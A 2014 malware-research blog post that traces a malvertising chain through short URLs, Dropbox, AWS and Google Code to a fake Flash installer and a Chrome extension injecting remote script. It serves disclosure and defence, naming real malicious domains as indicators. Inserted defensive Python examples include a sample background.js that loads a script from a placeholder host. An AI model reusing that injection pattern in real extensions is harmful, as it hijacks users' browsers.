2014-02-23

Today, I was about to go to bed when I bumped into this threat. Please kindly bear with the sleepy eyes while I write this. I am combining the screenshots and the log/details in text; hopefully no filtering product will block this post for a few pasted URLs.

This write-up contains many points that are important for fellow friends and for the public services mentioned, so that they are aware of being abused in this malware infection scheme. So I wrote it as fast as possible, leaving the payload binary analysis and exploit analysis for a rain check. Help from anyone who can contact the related abuse desks is very highly appreciated.

Infection Source:

First of all, the source of infection is the malware infection code/scripts implemented on the IP and domain below, located in the OVH network in France. I really hope to have help from French friends to clean this IP of any installed malware infector toolkits:


Secondly, the infector starts from a Japanese IP under the domain: shortening .biz

This needs to be cleaned up too, yet I think more infectors exist..

The background

It started when checking a suspicious URL, which I accessed in the browser as below:


I reproduced it with a separate scheme to record the log below (for the purpose of the source-of-infection details), just to make sure that we had everything in our hands:

Back to the browser: in a short while the browser's address bar flickered to the redirection URL, as below:

And this is confirmed by the series of HTML meta refresh tags grepped below:
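As an added example (not from the original post), here is an offline tracer for a meta-refresh redirect chain like the one grepped above; the shortener/redirector/landing URLs and page bodies in it are constructed placeholders, not the real sites:

```python
"""Added example (not from the original post): trace a meta-refresh redirect
chain offline, as the post's grep of meta refresh tags did hop by hop. All
URLs and page bodies here are constructed placeholders, not the real sites."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

# content="0;url=..." in its usual spellings: optional quotes/spaces, any case.
_REFRESH_RE = re.compile(r"^\s*\d+\s*;\s*url\s*=\s*['\"]?([^'\"\s]+)", re.I)


class _MetaRefreshParser(HTMLParser):
    """Collects the target of every <meta http-equiv="refresh"> in a page."""
    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)                        # names are already lowercased
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = _REFRESH_RE.match(a.get("content") or "")
            if m:
                self.targets.append(m.group(1))

def meta_refresh_target(base_url, html):
    """Absolute target of the first meta refresh on the page, or None."""
    p = _MetaRefreshParser()
    p.feed(html)
    return urljoin(base_url, p.targets[0]) if p.targets else None

def trace_chain(start_url, fetch, max_hops=10):
    """Follow meta refreshes; fetch(url) gives HTML or None; stop at the end,
    an unknown URL, a redirect loop, or max_hops."""
    chain, seen, url = [start_url], {start_url}, start_url
    for _ in range(max_hops):
        body = fetch(url)
        nxt = meta_refresh_target(url, body) if body is not None else None
        if nxt is None or nxt in seen:         # end of chain or redirect loop
            break
        chain.append(nxt)
        seen.add(nxt)
        url = nxt
    return chain

# Constructed pages for the shortener -> redirector -> landing-page hops.
PAGES = {
    "http://shortener.example/abc":
        '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://redirector.example/go.html">',
    "http://redirector.example/go.html":
        "<meta http-equiv='refresh' content='1;url=/landing/index.html'>",
    "http://redirector.example/landing/index.html": "<html><body>video</body></html>",
}
```

Calling `trace_chain("http://shortener.example/abc", PAGES.get)` returns the three hops in order; relative targets are resolved against the page that issued them.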

What happened next? I was forwarded to a page with a video of "a lady in the bed", as captured below:

I was just about to praise how fortunate I am.. but the video soon stopped and a warning message came up, popping the download of the Flash Player Setup.. as shown below:

The Path to Payload

Back to the shell, I simulated the download page for evidence:

And that actually gave me the script below:

And now we know why I got that redirection: dropboxusercontent.com (the very bottom link) is serving the infection landing page, and I was redirected into it. I will explain this later on. There are also other conditions for another redirection, for mobile access and the Opera browser, via GOO.GL short URLs. Anyway, if we expand those short URLs for mobile and the Opera browser we get a better picture:

(I will have to leave it to other friends to check those two links more deeply..)
Further research into the blacklisted URL found the abused Amazon AWS account below (sorted by history), used by the same threat:

And this is the malware file downloaded if you match the desired condition:

Now, this payload is well detected by the AV industry, as shown in the VirusTotal result here-->>[link]
If you run the payload, you will get the HTTP query and response as follows:

And this payload downloads a "config" with the hash and URL of another malware, as shown here:

Here's that "guncel.exe" malware download session in my shell.. a simple wget will do.. This could be an update or something of the sort.

This is the VirusTotal report of "guncel.exe"; it is the same file as the original payload, and it is also evidence that the origin of the payload is wjetphp.com (46.105.55.251)-->>[link]. The detection rate as a VBA-based Trojan Downloader is not so bad after all, good work.

Below is an interesting trace of what this malware did in memory:

These are just some traces of the VBA calls used.. (during the creation of a registry key)

Quick analysis that might help fellow researchers and infected victims:

The payload downloads the background.js JavaScript from a URL planted in the binary, as per the traffic below:

Which has the script as I pasted here-->>[link]
↑You can clearly see the malicious traffic redirection scheme and the access URL to the landing page (origin of the infection) in that script..

The next traffic explains how this background.js is called: the file manifest.json was downloaded, and it shows how background.js is executed by setting several security privileges for the execution of the script itself..

Can you see the effort to fake a "Google Shockwave Player" (is there any such product??) upon the execution of background.js above? Things are starting to make much more sense as to why so many Google-related "images" are used here.

PS: I will add some more reversing notes later on, but let's move on a bit.. too little time.. there are more important parts to cover..

What happens if we simulate the landing page access in the shell is something like this:

How did I get the payload downloaded then?? Let's see the code inside the page. Well.. it seems like I got hit by the timer function in this code:

The Google short URL is again used to hide the real malware payload URL, which is served from a Google Code SVN download!!

The download log can be seen in the follow-up section..

Well.. the bad guy behind this is really trying hard to convince the victim that some Google kind of application is being installed :-)

Some reversing & investigation notes

I used a recent sample from an abused Google Code SVN here:

The sample is in VT here-->[link]

Straight to the point: a reversing effort showing the CNC masked in the binary's strings:

The User Name :-))

Maybe we'll need these later, just in case, noted:

Next, following the trail of that CnC URL to find the junk used:

Now we can see the code clearly, instead of the PCAP data :-D
Look at the dates well: the crook recently modified the malicious background.js script.
It has the background.js and manifest.json code snipped below:

As explained way up above, the JSON is used for the execution of background.js. We didn't have a chance to disclose background.js clearly before, so this is it, a fresh one. First, the beautified full code of background.js is:

If you see what I see, the attacker is targeting the Google Chrome browser by abusing its API (chrome.tabs) to interact with the browser's tab system. This API can be used to create, modify, and rearrange tabs in the browser. Anyway, what he did is, on the "devtools://" index/tab, he programmed it to execute a remote script via the chrome.tabs.executeScript command from www.saatlikrapor .com/ext/s.php, which was BAD (gone now-->link and link). Either this crook loves Google so much or hates Google that much.. since now we know he is targeting Google Chrome browser end users too.
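To make this pattern checkable, here is an added example (not the post's or the actor's code) that statically scans an unpacked extension's manifest.json and background.js for a tabs-privileged background script injecting a remote URL through chrome.tabs.executeScript, the combination described above for background.js and manifest.json; the manifest, script and remote-host.invalid are constructed samples:

```python
"""Added example, not code from the post or the actor: a static check for an
unpacked Chrome extension that flags the pattern described above, a manifest
granting tab privileges to a background script plus a background.js that uses
chrome.tabs.executeScript to pull a remote script.  The manifest, script and
host below are constructed samples; remote-host.invalid is a placeholder."""
import json
import re

BROAD_PERMISSIONS = {"tabs", "<all_urls>", "webRequest", "webNavigation"}
_EXEC_RE = re.compile(r"chrome\.tabs\.executeScript\s*\(")
_URL_RE = re.compile(r"https?://[^\s'\"\\)]+")

def scan_manifest(manifest_text):
    """Broad permissions and background scripts declared in manifest.json."""
    m = json.loads(manifest_text)
    perms = set(m.get("permissions", [])) | set(m.get("host_permissions", []))
    return {"broad_permissions": sorted(perms & BROAD_PERMISSIONS),
            "background_scripts": list(m.get("background", {}).get("scripts", []))}

def remote_exec_urls(js_text, window=400):
    """http(s) URLs within `window` chars after each executeScript call."""
    urls = []
    for call in _EXEC_RE.finditer(js_text):
        urls += _URL_RE.findall(js_text[call.end():call.end() + window])
    return urls

def verdict(manifest_text, js_text):
    """Suspicious when a tabs-privileged background script injects remote code."""
    mf = scan_manifest(manifest_text)
    urls = remote_exec_urls(js_text)
    return {"suspicious": bool(urls) and "tabs" in mf["broad_permissions"],
            "remote_exec_urls": urls,
            "touches_devtools": "devtools://" in js_text.lower(), **mf}

# Constructed samples standing in for the manifest.json / background.js pair.
MANIFEST = json.dumps({
    "manifest_version": 2, "name": "Google Shockwave Player", "version": "1.0",
    "permissions": ["tabs", "<all_urls>"],
    "background": {"scripts": ["background.js"]}})
BACKGROUND_JS = """
chrome.tabs.onUpdated.addListener(function (tabId, info, tab) {
  if (tab.url.indexOf('devtools://') === 0) { return; }
  chrome.tabs.executeScript(tabId, {code:
    'var s=document.createElement("script");' +
    's.src="http://remote-host.invalid/ext/s.php";document.body.appendChild(s);'});
});
"""
```

`verdict(MANIFEST, BACKGROUND_JS)` reports the extension as suspicious together with the injected URL and the permissions that make the injection possible.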

PS: The saatlikrapor.com domain is hidden behind Cloudflare:

This is the domain information, a shiny brand-new one:

And how about the CnC used? akillitelefonburada.com; SAME pattern! :-) behind Cloudflare..

And under the registration details below:

We will have to deal with Turkish law enforcement to nail this guy for good:

No, no, it is NOT a hacking site: (Please don't preach to me about that..)

Updates

The domain WJETPHP.COM, which was reported in the top section as the "payload center" (read: CNC), is also still alive now, with the details below:

As you see, he is still hiding his service behind Cloudflare until now (read: a Cloudflare customer).

Moreover, the ownership of the domains:

Conclusion

How to conclude this matter generally? Obviously, well-known public internet services were targeted to spread this infection. Let me describe how many of those abused services were spotted in this single case:
Number one, amazonaws.com (property of Amazon AWS) is utilised by this actor for other bad-purpose schemes (see the mobile link and Opera browser link in the explanation above; whatever it is, it is not a good thing); we'd better warn Amazon AWS about this link.
Number two, dropboxusercontent.com (property of Dropbox, Inc.) is also utilised to serve the malware payload.
Is that all? No. Number three: see the domain in the payload URL, googlecode.com; it is the abuse of Google Code's SVN facility.
More? Yes, the last one, number four: the goo.gl service, the Google short URL, is also abused to hide the URL of the malware payload.

Google Code has been abused to serve malware payloads of this threat's series for quite a while; you can view the reports posted by our friend @sarimura (twitter) to the Project Hosting on Google Code group in Google Groups-->[here]. It shows how persistent the malware actor is in always creating a new Google project and using its download URL to serve the malware payloads. On the other hand, it shows that the bad actor(s) leave many traces on the Google Code servers while uploading the payloads (account ID, IP addresses, etc).. a hint to follow, isn't it?

Sample

I share all the samples, under the usual password; click the picture below to download:

Moral of the story: Our beloved internet and its services are badly abused by malware. Stay safe please!
PS: Comments and additions are to be added in the follow-up section! And it looks like this threat is bigger than expected, so I couldn't sleep again; gotta go to my day job now!

Updates: How bad is the abuse & this malvertisement?

The bad actor keeps on changing users in Amazon AWS and Google Code to serve the next malicious payload. The new abused Amazon AWS page is:
unluvideolari.s3.amazonaws .com/unlu.html URLQuery-->[link]

PoC of how bad the malware download is:

Another PoC:

The recent Google Code SVN that's being abused:

Google set a good workaround with 401 authentication:

Or the 403:

Now Emerging Threats has released a signature that can be used to identify this malware download:

Update info credit: @sarimura (twitter); signature: Emerging Threats & @node5 (twitter); tests & checks: @urlquery (twitter); thanks to Google for keeping on nuking the bad accounts and for the nice stats of the short URL.
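As an added example, not the post's code nor the Emerging Threats rule itself, here is a log-side check in the spirit of that signature: it flags completed .exe downloads from a Google Code SVN path in proxy log lines, while the 401/403 responses Google now returns are not counted as downloads; the log format, hosts, IPs and file names are constructed placeholders:

```python
"""Added example, not the post's nor Emerging Threats' code: a log-side check
in the spirit of the ET signature mentioned above (an .exe fetched over HTTP
from Google Code SVN), run over proxy log lines.  The log format and every
host, IP and file name below are constructed for this example."""
import re
from urllib.parse import urlparse

# Constructed format: "<time> <client-ip> <method> <url> <status> <content-type>"
_LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\S+)$")

def is_googlecode_svn_exe(url):
    """True for an .exe path under an svn/ tree on *.googlecode.com."""
    u = urlparse(url)
    host = (u.hostname or "").lower()
    path = u.path.lower()
    return ((host == "googlecode.com" or host.endswith(".googlecode.com"))
            and "/svn/" in path and path.endswith(".exe"))

def parse_line(line):
    """Split one log line into fields; None when it does not fit the format."""
    m = _LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status, ctype = m.groups()
    return {"ts": ts, "client": client, "method": method, "url": url,
            "status": int(status), "ctype": ctype}

def find_svn_exe_downloads(lines):
    """Alerts for completed (200) GETs matching the pattern; the 401/403
    blocks from Google shown above are not counted as downloads."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if (rec and rec["method"] == "GET" and rec["status"] == 200
                and is_googlecode_svn_exe(rec["url"])):
            alerts.append(rec)
    return alerts

# Constructed sample log; hosts, IPs and names are placeholders, not the post's IoCs.
SAMPLE_LOG = """\
2014-02-24T09:12:01Z 192.0.2.10 GET http://shortener.example/abc 302 text/html
2014-02-24T09:12:02Z 192.0.2.10 GET http://fakeproj.googlecode.com/svn/trunk/Flash_Player_Setup.exe 200 application/octet-stream
2014-02-24T09:12:03Z 192.0.2.11 GET http://fakeproj.googlecode.com/svn/trunk/README.txt 200 text/plain
2014-02-24T09:12:04Z 192.0.2.12 GET http://otherproj.googlecode.com/svn/trunk/setup.EXE 401 text/html
2014-02-24T09:12:05Z 192.0.2.13 GET http://notgooglecode.com/svn/x.exe 200 application/octet-stream
""".splitlines()
```

`find_svn_exe_downloads(SAMPLE_LOG)` returns only the second line; the look-alike host and the 401-blocked fetch are left out.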

Follow Up

Please help suspend user "buexe-x" of GoogleCode, he is spreading malware via SVN - Attached=download log >@Google pic.twitter.com/FT8cXTFFkg

— MalwareMustDie, NPO (@MalwareMustDie) February 24, 2014

To: @sakura_server The site written in the attached image is being abused for malware infection. The IP is on Sakura's VPS; would you be able to handle it? That URL has now caused a serious situation→ http://t.co/D6wJsYHCQf pic.twitter.com/2168JDJyBN

— Hendrik ADRIAN (@unixfreaxjp) February 24, 2014

Great follow-up, thanks for always being fast in responses!

@unixfreaxjp Thank you for contacting us. We will check it.

— SAKURA Internet development insider (α) (@sakura_server) February 24, 2014

@MalwareMustDie I have been reporting files on @googlecode and they have ignored the last report, apparently: https://t.co/SubFwB6Lc4

— Salim Sarımurat (@sarimura) February 24, 2014

Thanks @EmergingThreats for releasing: 2018191 – ET CURRENT_EVENTS SUSPICIOUS .exe Downloaded from SVN/HTTP on GoogleCode (current_events)

— MalwareMustDie, NPO (@MalwareMustDie) February 27, 2014

The malware infection scheme via Amazon AWS and Google Code SVN is still continuing http://t.co/7pkuqYkx1Z
It seems it can't be stopped no matter what; take one down and another appears right away.
Please be careful in Japan too!

— Hendrik ADRIAN (@unixfreaxjp) February 27, 2014

#MalwareMustDie!
